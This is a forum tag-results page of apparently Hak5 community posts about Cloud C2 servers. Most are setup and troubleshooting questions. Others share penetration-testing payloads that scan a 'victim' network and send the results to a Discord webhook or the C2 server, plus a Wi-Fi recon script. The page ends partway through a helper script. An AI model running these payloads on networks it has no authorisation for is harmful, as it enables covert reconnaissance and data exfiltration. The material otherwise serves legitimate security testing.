Showing results for tags 'c2'.

Found 23 results

  1. Hi, Novice Nano User. Pineapple Mark VII (on order but not yet arrived), Synology DS-218 NAS. If Ubuntu is a requirement, the Synology Package Center does not list Ubuntu as available for download. Where can I find a tutorial, video, or step by step instructions explaining how to establish C2 on a Synology? Many Thanks, Mongoose
  2. Is there a way to interact with the lan turtle via cobalt strike? If so, how do you set it up/configure?
  3. Cloud C² is running properly on the VPS server (previous problem is solved, no more conflict with other application! Great thanks to chrizree.)

     A Chinese saying goes that a drawing is better than 100,000 words… So, you can see a picture that shows my network config at https://github.com/th3m1s-42/th3m1s-42/blob/main/img/networkScheme1.png

     The Cloud C2 server is launched by systemd, from the /etc/systemd/system/cloudc2.service file:

         root@vps:/etc/systemd/system# cat cloudc2.service
         [Unit]
         Description=Hak5 Cloud C2
         After=cloudc2.service

         [Service]
         Type=idle
         ExecStart=/usr/local/bin/c2-3.1.2_amd64_linux \
             -hostname fullyQualifiedName.tld \
             -https \
             -keyFile /path/to/keys/myFile.key \
             -certFile /path/to/certs/myFile.crt \
             -db /path/to/hak5c2/c2.db

         [Install]
         WantedBy=multi-user.target
         root@vps:/etc/systemd/system#

     I connect my laptop to the Internet through the WiFi Pineapple… So I presume that, if my laptop can reach a host on the net, my Pineapple device can do it too… I can surf the Internet without problem.

     I have run 3 tests to ensure that ports 80, 443 and 2022 are enabled:

       • In the address field of my favorite browser, I type "fullyQualifiedName.tld:80". The Hak5 Cloud C² login page is displayed in the browser window without using SSL. C² is listening for HTTP on port 80.
       • Same thing with "fullyQualifiedName.tld:443", same result with SSL. C² is listening for HTTPS on port 443.
       • In a terminal window:

         myself@MacBook ~ % ssh -p 2022 foobar@fullyQualifiedName.tld
         The authenticity of host '[fullyQualifiedName.tld]:2022 ([aaa.bbb.ccc.ddd]:2022)' can't be established.
         RSA key fingerprint is SHA256:sgRolDenN95AzPaxDE6BUY6npK3VTdd2xOfVuZyQL/E.
         Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
         Warning: Permanently added '[fullyQualifiedName.tld]:2022,[aaa.bbb.ccc.ddd]:2022' (RSA) to the list of known hosts.
         foobar@fullyQualifiedName.tld: Permission denied (publickey).
         myself@MacBook ~ %

         C² is listening for SSH on port 2022 (even though the foobar user does not exist on this VPS! 😂).

     So, I think everything is OK to add my Pineapple device to Cloud C². I create a device in the Cloud C² admin interface (Add button) with type "WiFi Pineapple NANO / TETRA". I download the device.config with the Setup button on the newly created device page… I upload this file to the Pineapple device:

         myself@MacBook ~ % scp ~/Downloads/device.config root@172.14.42.1:/etc/
         root@172.16.42.1's password:
         device.config 100% 832 168.3KB/s 00:00
         myself@MacBook ~ %

     I reboot the Pineapple device with the admin interface of the Pineapple (http://172.16.42.1:1471/). Unfortunately, the Pineapple stays offline with the status "Last Seen: never".

     Another test:

         myself@MacBook ~ % ssh root@172.16.42.1
         root@172.16.42.1's password:

         BusyBox v1.30.1 () built-in shell (ash)

         ***** WiFiPineapple Banner *****
         With OpenWRT 19.07.2
         ---------------------
         root@PineappleTetra:~# ps xaf
           PID TTY      STAT   TIME COMMAND
             2 ?        S      0:00 [kthreadd]
             7 ?        S      0:00 \_ [ksoftirqd/0]
             6 ?        I<     0:00 \_ [mm_percpu_wq]
             4 ?        I<     0:00 \_ [kworker/0:0H]
             3 ?        I      0:02 \_ [kworker/0:0]
             5 ?        I      0:01 \_ [kworker/u2:0]
             8 ?        I      0:01 \_ [kworker/u2:1]
            82 ?        S      0:00 \_ [oom_reaper]
            88 ?        I<     0:00 \_ [kblockd]
            85 ?        S      0:00 \_ [kcompactd0]
            83 ?        I<     0:00 \_ [writeback]
            86 ?        I<     0:00 \_ [crypto]
           122 ?        S      0:00 \_ [kswapd0]
           184 ?        S      0:00 \_ [spi0]
           281 ?        I<     0:00 \_ [ipv6_addrconf]
           283 ?        I<     0:00 \_ [dsa_ordered]
           295 ?        S      0:00 \_ [ubi_bgt0d]
           300 ?        I<     0:00 \_ [kworker/0:1H]
           361 ?        I      0:00 \_ [kworker/0:3]
           404 ?        S      0:00 \_ [ubifs_bgt0_1]
           594 ?        I<     0:00 \_ [cfg80211]
           632 ?        I<     0:00 \_ [rpciod]
           633 ?        I<     0:00 \_ [xprtiod]
           666 ?        I<     0:00 \_ [nfsiod]
          3906 ?        I      0:00 \_ [kworker/u2:2]
             1 ?        Ss     0:02 /sbin/procd
           470 ?        S      0:00 /sbin/ubusd
           498 ttyS0    Ss+    0:00 /sbin/askfirst /bin/login
           564 ?        S      0:01 /sbin/urngd
           889 ?        S      0:00 /sbin/logd -S 64
          1000 ?        S      0:00 /sbin/netifd
          1243 ?        S      0:00 \_ udhcpc -p /var/run/udhcpc-eth0.pid -s /lib/netifd
          1052 ?        Ss     0:00 /usr/sbin/atd
          1497 ?        Ss     0:00 php-fpm: master process (/etc/php7-fpm.conf)
          1499 ?        S      0:01 \_ php-fpm: pool www
          1498 ?        S      0:01 \_ php-fpm: pool www
          1527 ?        S      0:00 /usr/sbin/sshd -D
          3632 ?        Ss     0:00 \_ sshd: root@pts/0
          3646 pts/0    Ss     0:00 \_ -ash
          4635 pts/0    R+     0:00 \_ ps xaf
          1571 ?        S      0:00 nginx: master process /usr/sbin/nginx -c /etc/nginx/n
          1611 ?        S      0:00 \_ nginx: worker process
          1574 ?        Ss     0:07 /usr/sbin/hostapd -P /var/run/wifi-phy0.pid -B /var/r
          1625 ?        S      0:00 /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf.cfg01411c
          1746 ?        S<     0:00 /usr/sbin/ntpd -n -N -S /usr/sbin/ntpd-hotplug -p 0.o
          1749 ?        S      0:00 /bin/sh /etc/rc.common /etc/rc.d/S99cc-client boot
          1753 ?        S      0:20 \_ cc-client /etc/device.config
         root@PineappleTetra:~#

     A cc-client process is running. The Pineapple device should connect to the Cloud C² server… but nothing! I even tried to change the device name to PineappleTetra (hostname of the device, seen during the ssh session, above) in the Cloud C² server and repeat the process of configuration (download device.config from server, upload it to device and reboot device), to no avail. 🙃

     I don't understand: I think I have done everything like RTFM!! 😢 Has anyone an idea? Where can I look for the solution?

     Thank you for the help, Best regards. Éd.
  4. I run a VPN service to connect to the Internet. I can open my C2 instance OK and see my devices and stats OK. When I select a device, terminal, and try to open a SSH connection to the device I get the spinning circle icon and never get the SSH session established. Any suggestion on how to keep my VPN session and be able to open a SSH session from within my C2 instance would be appreciated.
  5. Nmap Quickscan with Discord Integration (Cleaned & C2 Enabled)

     This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. The Payload waits for "Internet Connection" to be present. Once Internet Connection is found, It scans the local subnet for any online devices. - While also logging the Public IP of the Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.)

     payload.sh

         #!/bin/bash
         # Title: Nmap Quickscan w/ Discord Integration (Cleaned & C2 Enabled)
         # Author: REDD of Private-Locker
         # Version: 1.3
         #
         # This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to.
         # The Payload waits for "Internet Connection" to be present. Once Internet Connection is found,
         # It scans the local subnet for any online devices. - While also logging the Public IP of the
         # Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.)
         #
         # Magenta w/ Yellow ........Waiting for Internet
         # 1st Yellow flashing.......Scanning for Gateway/Subnet
         # Cyan flashing.............Running Nmap scan on x.0/24
         # 2nd Yellow Flashing.......Installing dependencies for Discord Integration
         # Yellow....................Sent to Discord Webhook
         # Blue......................Exfiltrating to C2
         # Red.......................Failed C2/EXFIL/Scanning
         # Green.....................Finished

         # Turn on Discord Integration (Yes = 1, No = 0)
         DISCORD=0
         WEBHOOK='PLACE_DISCORD_WEBHOOK_HERE'
         # Send Loot as File or Plain Messages (File = 1, Messages = 0)
         AS_FILE=0

         if [ -f "/etc/device.config" ]; then
             INITIALIZED=1
         else
             INITIALIZED=0
         fi

         LED SETUP
         NETMODE DHCP_CLIENT
         while ! ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done
         URL="http://www.example.com"
         while ! wget $URL -qO /dev/null; do sleep 1; done
         GET_GATEWAY=$(route -n | grep 'UG[ \t]' | awk '{print $2}')
         while [ $GET_GATEWAY == "" ]; do sleep 1; done
         INTERNAL_IP=$(ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p')
         SUBNET=$(echo "$GET_GATEWAY" | awk -F"." '{print $1"."$2"."$3".0/24"}')
         CHK_SUB=$(echo $INTERNAL_IP | cut -d"." -f1-3)
         FIN_SUB="${CHK_SUB}.0/24"
         LED ATTACK;
         if [ "$SUBNET" != "$FIN_SUB" ]; then
             LED R FAST; sleep 2; LED R SOLID;
         else
             # Fix for Timestamp Update
             ntpd -gq; sleep 1;
             DATE_FORMAT=$(date '+%m-%d-%Y_%H:%M:%S')
             LOOT_DIR="/root/loot/nmap-diag"
             LOOT_FILE="$LOOT_DIR/diag-${DATE_FORMAT}.txt"
             if [ ! -d "$LOOT_DIR" ]; then
                 mkdir -p "$LOOT_DIR"
             fi
             if [ ! -f "$LOOT_FILE" ]; then
                 touch "$LOOT_FILE"
             fi
             # Get Public IP and run NMAP scan
             PUBLIC_IP=$(wget -q "http://api.ipify.org" -O -)
             printf "\n Public IP: ${PUBLIC_IP}\n Online Devices for ${SUBNET}:\n--------------------------------------------\n\n" >> "$LOOT_FILE"
             LED C VERYFAST
             run_nmap () {
                 nmap -sn --privileged "$SUBNET" --exclude "$INTERNAL_IP" | awk '/Nmap scan report for/{printf " -> ";printf $5;}/MAC Address:/{print " - "substr($0, index($0,$3)) }' >> "$LOOT_FILE"
             }
             run_nmap &
             PID=$!
             while kill -0 "$PID" 2>&1 >/dev/null; do
                 wait $PID
             done
             if [ -s "$LOOT_FILE" ]; then
                 if [ "$DISCORD" == 1 ]; then
                     CURL_CHK=$(which curl)
                     if [ "$CURL_CHK" != "/usr/bin/curl" ]; then
                         LED Y VERYFAST;
                         opkg update;opkg install libcurl curl;
                     fi
                     LED Y SOLID
                     if [ "$AS_FILE" == 1 ]; then
                         FILE=\"$LOOT_FILE\"
                         curl -s -i -H 'Content-Type: multipart/form-data' -F FILE=@$FILE -F 'payload_json={ "wait": true, "content": "Loot has arrived!", "username": "SharkJack" }' $WEBHOOK
                     fi
                     if [ "$AS_FILE" == 0 ]; then
                         while read -r line; do
                             DISCORD_MSG=\"**$line**\"
                             curl -H "Content-Type: application/json" -X POST -d "{\"content\": $DISCORD_MSG}" $WEBHOOK
                         done < "$LOOT_FILE"
                     fi
                     LED G SOLID;sleep 2;
                 fi
                 if [ "$INITIALIZED" == 1 ]; then
                     LED Y SOLID
                     if [ -z "$(pgrep cc-client)" ]; then
                         C2CONNECT
                         while ! pgrep cc-client; do LED B SOLID;sleep .2;LED G SOLID;sleep .8; done
                     fi
                     # Re-issuing C2CONNECT to verify loot push to C2
                     C2CONNECT
                     sleep 2
                     C2EXFIL STRING "${LOOT_FILE}" "Nmap Diagnostic for Network ${SUBNET}"
                     LED M VERYFAST;
                     sleep 2;
                 fi
                 LED FINISH;
             else
                 LED R SOLID;
                 rm -rf "$LOOT_FILE";
             fi
         fi
  6. How do I upgrade my cloud server? I bought the pro license but there is no place to add it and when I try to upgrade I just get redirected to purchase it again?? Any help is appreciated.
  7. denisit

    C2 ipV6

    Hello, I am trying to set up a C2 server on a RPI 3 but I have a problem. I just want to use it in a LAN. I run the command below:

        ./c2_community-linux-armv5 -hostname RPI_IP

    But I cannot access the web interface. When I check the listening ports with netstat I see the C2 server listens on tcp6, not on tcp:

        tcp        0      0 0.0.0.0:22      0.0.0.0:*       LISTEN
        tcp6       0      0 :::8080         :::*            LISTEN
        tcp6       0      0 :::22           :::*            LISTEN
        tcp6       0      0 :::2022         :::*            LISTEN
        tcp6       0      0 :::6600         :::*            LISTEN

    Thanks.
  8. Hey Fam! I just set up my c2 cloud server on a digitalocean VPS w/ https, domain name and everything with no issues. I also set up my wifi pineapple to reconnect to the c2 web server when it connects to the interwebz. I cannot, however, seem to get the recon module working in the c2 web interface. It just keeps loading and saying there is no recon info yet. I let it run for a good 30-40 minutes before deciding something was wrong. Is this a bug or something on my end? Any help would be greatly appreciated. Much love to Hak5, Ramp115
  9. Hi,

     We're happy to announce the 2.2.x release of the Cloud C2, which features a new notifications system and support for the new Hak5 Key Croc!

     Change Log (2.2.0)

       • Hak5 Key Croc: Added support for the Hak5 Key Croc! Hak5's Key Croc is a Keylogger armed with pentest tools, remote access and payloads that trigger multi-vector attacks when chosen keywords are typed. Live keystrokes, typed history and keystroke injection can be performed remotely with ease.
       • Notifications: Notifications can now be sent from enrolled devices. Notifications can be managed from the new bell icon in the status bar of the Cloud C2.

     You can download the latest version over-the-air in your existing Cloud C2 instance on Linux or Mac, or visit the Hak5 Download Center to grab the release for all supported devices and operating systems.

     As always, thank you for the support and great community feedback!
  10. Hello Everyone,

      When this guide was first launched I was about mid-way through my studies in Networking and Systems Administration, and since I've learned a lot since then I decided to completely rework this guide (04/05/2020). I want to provide everyone with a guide that will not only get you up and running, but will also provide you with a stable environment as well. Please remember that I am NOT responsible for your actions, and you should never perform nor condone any illegal activities.

      Notes: This installation guide is written ONLY for Ubuntu 18.04/20.04 LTS.

      Step 1. Update, upgrade, and clean your machine.

          sudo apt -y update && sudo apt -y upgrade && sudo apt clean

      Step 2. Install required packages.

          sudo apt -y install unzip ufw

      Step 3. Open ports depending on your needs (20, 2022, 80, 8080, 443).

          sudo ufw allow 22,2022,80,8080,443/tcp && sudo ufw enable && sudo ufw reload

      Step 4. Download and unzip the community ZIP files in the tmp directory.

          sudo wget https://c2.hak5.org/download/community -O /tmp/community && sudo unzip /tmp/community -d /tmp

      Step 5. Move the c2_community* file to /usr/local/bin, and create the required database directory.

          sudo mv /tmp/c2_community-linux-64 /usr/local/bin && sudo mkdir /var/hak5c2

      Step 6. Create a new systemd service to run the Hak5 C2 script.

          sudo vim /etc/systemd/system/hak5.service

      Step 7. Utilize a template below, or build your own.

      Template A (https)

          [Unit]
          Description=Hak5 C2
          After=hak5.service

          [Service]
          Type=idle
          ExecStart=/usr/local/bin/c2_community-linux-64 -hostname IPAddressORHostname -https -db /var/hak5c2/c2.db

          [Install]
          WantedBy=multi-user.target

      Template B (http)

          [Unit]
          Description=Hak5 C2
          After=hak5.service

          [Service]
          Type=idle
          ExecStart=/usr/local/bin/c2_community-linux-64 -hostname IPAddressORHostname -db /var/hak5c2/c2.db

          [Install]
          WantedBy=multi-user.target

      Template C (http / port 80)

          [Unit]
          Description=Hak5 C2
          After=hak5.service

          [Service]
          Type=idle
          ExecStart=/usr/local/bin/c2_community-linux-64 -hostname IPAddressORHostname -listenport 80 -db /var/hak5c2/c2.db

          [Install]
          WantedBy=multi-user.target

      Step 8. Reload the systemd daemon, enable the service, and start.

          sudo systemctl daemon-reload && sudo systemctl enable hak5.service && sudo systemctl start hak5.service

      Step 9. View the status of your service in order to view your key.

          sudo systemctl status hak5.service

      Step 10. Visit your website and fill in the required information to finalize.

      Step 11. Sign into your Hak5 C2 website.

      Step 12. Add devices, export logs, and more! Woot!
  11. OK, so I'm new to this, but if I want to combine a couple of the payloads that are available at the Hak5 GitHub, can I, for example, make one payload that has the WiFi connect payload and the Open AP Nmap? My thought was to copy the payloads into a single payload and make each individual payload a function! Any tips or tricks would be nice!

      My goal is that if it connects to a specific network when it boots up, it will dump the loot to C2, but if it doesn't connect, it will automatically start the Open AP Nmap Scan.

      This is what I have so far:

          #!/bin/bash
          # This is a test to see if my network is in range, it will connect home and export the loot to C2
          # if my network is out of range or can't connect to it, it will do the Open AP Attack!

          # Title: Simple WiFi Connection Example
          # Author: Hak5Darren
          # Version: 1.0

          function Home() {
              # WiFi Client Setup
              WIFI_SSID="SSID"
              WIFI_PASS="Password"
              LED SETUP
              WIFI_CONNECT
              # optionally start SSH server
              # /etc/init.d/sshd start
              LED ATTACK
              C2CONNECT && C2EXFIL
          }

          function OpenAP() {
              # Title: Open AP Nmap Scanner
              # Author: Hak5Darren
              # Version: 1.0
              #
              # Description: Scans for open access points, then connects to each and runs an Nmap scan saving logs to the loot folder
              #
              # LED SETUP: Scanning
              # LED ATTACK: Connected, running nmap scan
              #
              # See nmap --help for options. Default "-sP" ping scans the address space for fast host discovery.
              NMAP_OPTIONS="-sP"
              LOOT_DIR=/root/loot/open_ap_nmap_scan
              MAX_CIDR=20
              DEBUG=1

              function scan_wifi() {
                  [[ $DEBUG == 1 ]] && echo Scanning for open access points | tee -a /tmp/payload.log
                  iwlist wlan0 scan > /tmp/wifi_scan
                  cat /tmp/wifi_scan | grep "Encryption key:off" -A1 | grep ESSID | sort | uniq | cut -c 28- | sed "s/.$//g" > /tmp/open
                  total_aps=$(cat /tmp/open | wc -l)
                  [[ $DEBUG == 1 ]] && echo Found "$total_aps" open access points | tee -a /tmp/payload.log
              }

              function check_ap() {
                  current_ap=$(sed -n "$on"p /tmp/open)
                  [[ $DEBUG == 1 ]] && echo "-------------------------------" | tee -a /tmp/payload.log
                  current_ap_mac=$(cat /tmp/wifi_scan | grep "$current_ap" -B5 | grep Address | awk {'print $5'} | head -1)
                  [[ $DEBUG == 1 ]] && echo Selected AP MAC: "$current_ap_mac" | tee -a /tmp/payload.log
                  if grep -i -q "$current_ap_mac" /tmp/nmap_scanned; then
                      [[ $DEBUG == 1 ]] && echo Skipping - Already scanned AP: "$current_ap" with MAC: "$current_ap_mac" | tee -a /tmp/payload.log
                  else
                      connect_wifi
                      scan_network
                  fi
              }

              function connect_wifi() {
                  LED STAGE1
                  [[ $DEBUG == 1 ]] && echo Connecting to Open WiFi AP: "$current_ap" | tee -a /tmp/payload.log
                  ifconfig wlan0 down
                  iwconfig wlan0 mode Managed essid "$current_ap"
                  ifconfig wlan0 up
                  while(iwconfig wlan0 | grep Not-Associated); do sleep 1; done
                  [[ $DEBUG == 1 ]] && echo "Connected to AP number $on with SSID $current_ap" | tee -a /tmp/payload.log
                  udhcpc -i wlan0
                  while [ -z "$SUBNET" ]; do
                      sleep 1 && find_subnet
                  done
                  APMAC=$(iw wlan0 link | grep Connected | awk {print'$3'})
                  [[ $DEBUG == 1 ]] && echo "AP MAC Address/BSSID: $APMAC" | tee -a /tmp/payload.log
                  [[ $DEBUG == 1 ]] && iwconfig wlan0 | grep ESSID | tee -a /tmp/payload.log
                  [[ $DEBUG == 1 ]] && ifconfig wlan0 | grep inet | tee -a /tmp/payload.log
              }

              function scan_network() {
                  LED STAGE2
                  find_subnet
                  [[ $DEBUG == 1 ]] && echo "Found Subnet: $SUBNET" | tee -a /tmp/payload.log
                  CIDR=$(echo $SUBNET | cut -d '/' -f 2)
                  [[ $DEBUG == 1 ]] && echo "CIDR: $CIDR" | tee -a /tmp/payload.log
                  if [ "$CIDR" -ge "$MAX_CIDR" ]
                  then
                      [[ $DEBUG == 1 ]] && echo "Starting network scan" | tee -a /tmp/payload.log
                      nmap $NMAP_OPTIONS $SUBNET -oN "$LOOT_DIR/$current_ap-$APMAC.txt" &>/dev/null
                  else
                      [[ $DEBUG == 1 ]] && echo "Network too large - skipping scan" | tee -a /tmp/payload.log
                  fi
                  echo $APMAC >> /tmp/nmap_scanned
              }

              function find_subnet() {
                  SUBNET=$(ip addr | grep -i wlan0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
                  [[ $DEBUG == 1 ]] && echo "Found subet for network $current_ap as $SUBNET" | tee -a /tmp/payload.log
              }

              function run() {
                  while true; do
                      setup
                      scan_wifi
                      while [ "$on" -le "$total_aps" ]
                      do
                          if [ "$on" -ge 1 ]; then check_ap; fi
                          let on=on+1
                      done
                      sleep 5
                      [[ $DEBUG == 1 ]] && echo Completed recon. Restarting... | tee -a /tmp/payload.log
                  done
              }

              function setup() {
                  LED SETUP
                  mkdir -p $LOOT_DIR
                  touch /tmp/nmap_scanned
                  on=0
                  killall wpa_supplicant
              }

              # Run payload
              run
          }

          Home && poweroff || OpenAP
  12. Hello. I just downloaded cloud c2 and was setting up the server. I closed down the cmd-windows and when I launched the .exe again, the token wouldn't show. Any ideas how to get the token again? Thanks.
  13. Hey guys, I have a packet squirrel setup in Cloud2 and I can successfully start a terminal session. In a terminal session I would like to run a packet capture. If I run the command tcpdump -nni eth1 -f /mnt/loot/tcpdump/test2.pcap I am able to capture some packets. I can Exfil the packet capture with the command: C2EXFIL /mnt/loot/tcpdump/test2.pcap and the file shows up in the C2 dashboard. However, when I download the pcap, Wireshark cannot open it. I get an error message: "The file test2.pcap isn't a capture file in a format that Wireshark understands" Screenshot: https://imgur.com/a/t9MJtoZ I can open the pcap file with Wireshark from the USB stick, if I remove it from the Packet Squirrel and plug it into my PC. Could the C2EXFIL command be modifying the .pcap file when it moves it? I've used the C2EXFIL command to move other files like .txt and .nmap and have not had any issues. Has anyone else experienced this or figured out a way to move pcap's using C2EXFIL?
  14. Hey guys! Been setting up my devices in prep for an up and coming pen test. I can connect my devices to C2 and I came across 2 issues. The first one is about seeing any Loot for the Lan Turtle in C2. I can see Loot for other devices and I know that the Lan Turtle doesn't work exactly the same way as say the Shark Jack in regards to gathering loot. But I was wondering if someone got a method of getting a specific folder shared to the C2 Loot section for the Lan Turtle. Thoughts?
  15. Heya! So, been setting up my devices in C2. Got all of them in there and I can see the Loot as well as other items like say the Pineapple Tetra's SSIDs and such. One thing I can't seem to do is SSH from C2 to any device. I was wondering if I'm missing something specific on my setup. I have even tried setting SNATs to the devices, though I knew that wouldn't have been a requirement nor really worked... But I went that far as I just couldn't figure it out. It would really help me if I can get this sorted as I have a Pen Test coming up and I'm foreseeing the need to drop some of the devices on site. A work around is dropping a Raspberry Pi or something with them, but it does add an additional device. Thoughts?
  16. I have a question: can the C2 platform allow, for instance, when you've got password or other hashes, sending them to a GPU on the C2 server to break them, or some other CPU/GPU grunt work? I should be able to do it using a shell on the VM server, passing 2 K2 GRID NVIDIA cards to it in an ESXi based machine (Thanks Matt circa 2009). Can this be done just using the C2 interface etc.? Can it be added??
  17. I have a new install of Cloud C2 and a WiFi Pineapple. I've just been tweaking the configuration, etc. when I noticed that the Pineapple shows offline in the C2 server after about 15 minutes (the exact time varies, sometimes it can be longer). Each time it happens, all indications are that the Pineapple is continuing to function fine. I can log in via web or SSH, stop and start PineAP, make configuration changes, etc. The Pineapple can ping the C2 server by name. If I reboot the Pineapple it reconnects to the C2 server, but that's the only way I can figure out to get it to reconnect. Obviously this is less than ideal.

      I've tried searching the forums and Google for any similar problem and can't find anything similar. I'm also having an issue with the Recon function on C2 working at all, but I posted about that one separately as others have reported that one. Any help or hint at what could be wrong would be greatly appreciated.

      I'm running Cloud C2 v2.1.2 Pro Edition on Windows Server 2016 build 1607 and WiFi Pineapple TETRA with firmware v2.7.0. WiFi Pineapple is using eth0 cabled to the LAN and connects to the C2 server over a stable private LAN with less than 2ms latency. I'm running everything on my internal LAN for right now, just to test. I've got PineAP running constantly, almost no modules installed (none of them are active anyway).

      Here's what my C2 looks like when the Pineapple disconnects:

      There is nothing interesting in the Pineapple itself by watching logread. Here are my relevant Cloud C2 logs:

          2020-04-28 12:28:07 Device 'Test Wifi Pineapple' has gone offline
          2020-04-28 12:03:06 Device 'Test Wifi Pineapple' has started up
          2020-04-28 11:28:49 Device 'Test Wifi Pineapple' has gone offline
          2020-04-28 10:46:39 Device 'Test Wifi Pineapple' has started up
          2020-04-28 09:42:04 Device 'Test Wifi Pineapple' has gone offline
          2020-04-28 09:25:10 Device 'Test Wifi Pineapple' has started up
          2020-04-27 17:01:00 Device 'Test Wifi Pineapple' has gone offline
          2020-04-27 16:32:58 Device 'Test Wifi Pineapple' has started up
  18. SharkHelper

      This Tool completes the Hak5 "SharkJack.sh" script. This adds small features that the original Helper Script is missing - While also making it easier to setup/re-setup the SharkJack itself. Linux version to be released soon. Any features or requests are welcome.

      The Menu:

          O=====================================O
          |                                     |
          |          SharkHelper Menu           |
          |                                     |
          O=====================================O

          1. Install SharkLib
          2. Remove SharkLib
          3. Install Default Nmap Scan
          4. Install Internet Tester
          5. Install Internet Tester C2

          6. View Current Payload

          7. Install C2 Config File (device.config)

          0. Exit SharkHelper

          Select # from Menu and Press ENTER:

      The Code:

          @echo off
          REM
          REM Name: SharkHelper (Windows 10)
          REM Version: 1.2
          REM Author: REDD of PL
          REM Target OS: Windows 10
          REM Description: This script is to help make setting up the SharkJack EVEN easier
          REM than Hak5's Script. I don't know how much easier it can get.
          REM
          SET "SHARK_IP=172.16.24.1"
          cls
          echo Please put SharkJack into Arming Mode and
          echo connect it to the Ethernet Port on your PC.
          echo.
          echo.
          echo Waiting..
          echo.
          :loop
          ping -n 1 %SHARK_IP% |find "TTL=" >NUL 2>NUL || goto :loop
          echo Connected.
          timeout /t 2 /NOBREAK >NUL

          :SHARKHELPER_MENU
          cls
          echo.
          echo.
          echo O=====================================O
          echo ^|                                     ^|
          echo ^|          SharkHelper Menu           ^|
          echo ^|                                     ^|
          echo O=====================================O
          echo.
          echo 1. Install SharkLib
          echo 2. Remove SharkLib
          echo 3. Install Default Nmap Scan
          echo 4. Install Internet Tester
          echo 5. Install Internet Tester C2
          echo.
          echo 6. View Current Payload
          echo.
          echo 7. Install C2 Config File (device.config)
          echo.
          echo 0. Exit SharkHelper
          echo.
          echo.
          SET /P MENU1=Select # from Menu and Press ENTER: 
          IF "%MENU1%"=="1" GOTO INSTALL_SHARKLIB
          IF "%MENU1%"=="2" GOTO REMOVE_SHARKLIB
          IF "%MENU1%"=="3" GOTO DEFAULT_NMAP
          IF "%MENU1%"=="4" GOTO INSTALL_INTERNET_TESTER
          IF "%MENU1%"=="5" GOTO INSTALL_C2_INTERNET_TESTER
          IF "%MENU1%"=="6" GOTO VIEW_PAYLOAD
          IF "%MENU1%"=="7" GOTO INSTALL_C2_CONFIG
          IF /I "%MENU1%"=="q" GOTO EOF
          IF /I "%MENU1%"=="e" GOTO EOF
          IF /I "%MENU1%"=="quit" GOTO EOF
          IF /I "%MENU1%"=="exit" GOTO EOF
          IF /I "%MENU1%"=="0" GOTO EOF
          GOTO SHARKHELPER_MENU

          :INSTALL_SHARKLIB
          cls
          IF NOT EXIST "%CD%\sharklib.sh" (
              echo Downloading SharkLib to local folder.
              powershell -Command "(New-Object Net.WebClient).DownloadFile('https://git.private-locker.com/project/sharklib/raw/master/sharklib.sh', 'sharklib.sh')"
          )
          IF EXIST "%CD%\sharklib.sh" (
              echo SharkLib already exists in current directory. Using that copy.
          )
          echo.
          echo.
          echo Pushing sharklib.sh to SharkJack at %SHARK_IP%
          echo Connecting to the SharkJack..
          echo.
          echo (Input password: hak5shark OR Password you have already set.)
          scp %CD%\sharklib.sh root@%SHARK_IP%:/root/sharklib.sh
          echo.
          echo.
          echo Executing SharkLib, Exit SharkLib to return to this Menu.
          echo.
          ssh root@%SHARK_IP% "chmod +x sharklib.sh;bash /root/sharklib.sh --install;exit"
          echo.
          echo Finished. Returning to SharkHelper Menu.
          pause
          GOTO SHARKHELPER_MENU

          :REMOVE_SHARKLIB
          cls
          echo.
          echo.
          echo Attempting to remove SharkLib from the SharkJack.
          echo Connecting to the SharkJack..
          echo.
          echo.
          echo (Input password: hak5shark OR Password you have already set.)
          ssh root@%SHARK_IP% "sharklib --remove;exit"
          echo.
          echo Finished. Returning to SharkHelper Menu.
          pause
          GOTO SHARKHELPER_MENU

          :DEFAULT_NMAP
          cls
          IF NOT EXIST "%CD%\payload_default.sh" (
              echo Downloading SharkLib to local folder.
              powershell -Command "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/hak5/sharkjack-payloads/master/payloads/library/recon/Sample-Nmap-Payload/payload.sh', 'payload_default.sh')"
          )
          IF EXIST "%CD%\payload_default.sh" (
              echo SharkLib already exists in current directory. Using that copy.
          )
          echo.
          echo.
          echo Pushing payload_default.sh to SharkJack at %SHARK_IP%
          echo Connecting to the SharkJack..
          echo.
          echo (Input password: hak5shark OR Password you have already set.)
          scp %CD%\payload_default.sh root@%SHARK_IP%:/root/payload/payload.sh
          echo.
          echo Finished. Returning to SharkHelper Menu.
          pause
          GOTO SHARKHELPER_MENU

          :INSTALL_INTERNET_TESTER
          cls
          IF NOT EXIST "%CD%\payload_Internet_Tester.sh" (
              echo Downloading Internet Tester to local folder.
              powershell -Command "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/hak5/sharkjack-payloads/master/payloads/library/util/internet-access-tester/payload.sh', 'payload_Internet_Tester.sh')"
          )
          IF EXIST "%CD%\payload_Internet_Tester.sh" (
              echo Internet Tester Payload already exists in current directory. Using that copy.
          )
          echo.
          echo.
          echo Pushing payload_Internet_Tester.sh to SharkJack at %SHARK_IP%
          echo Connecting to the SharkJack..
          echo.
          echo (Input password: hak5shark OR Password you have already set.)
          scp %CD%\payload_Internet_Tester.sh root@%SHARK_IP%:/root/payload/payload.sh
          echo.
          echo Finished. Returning to SharkHelper Menu.
          pause
          GOTO SHARKHELPER_MENU

          :INSTALL_C2_INTERNET_TESTER
          cls
          IF NOT EXIST "%CD%\payload_C2_Internet_Tester.sh" (
              echo Downloading Internet Tester to local folder.
              powershell -Command "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/hak5/sharkjack-payloads/master/payloads/library/util/internet-access-tester/payload.sh', 'payload_C2_Internet_Tester.sh')"
              echo C2CONNECT >> %CD%\payload_C2_Internet_Tester.sh
          )
          IF EXIST "%CD%\payload_C2_Internet_Tester.sh" (
              echo Internet Tester Payload already exists in current directory. Using that copy.
          )
          echo.
          echo.
          echo Pushing payload_Internet_Tester.sh to SharkJack at %SHARK_IP%
          echo Connecting to the SharkJack..
          echo.
          echo (Input password: hak5shark OR Password you have already set.)
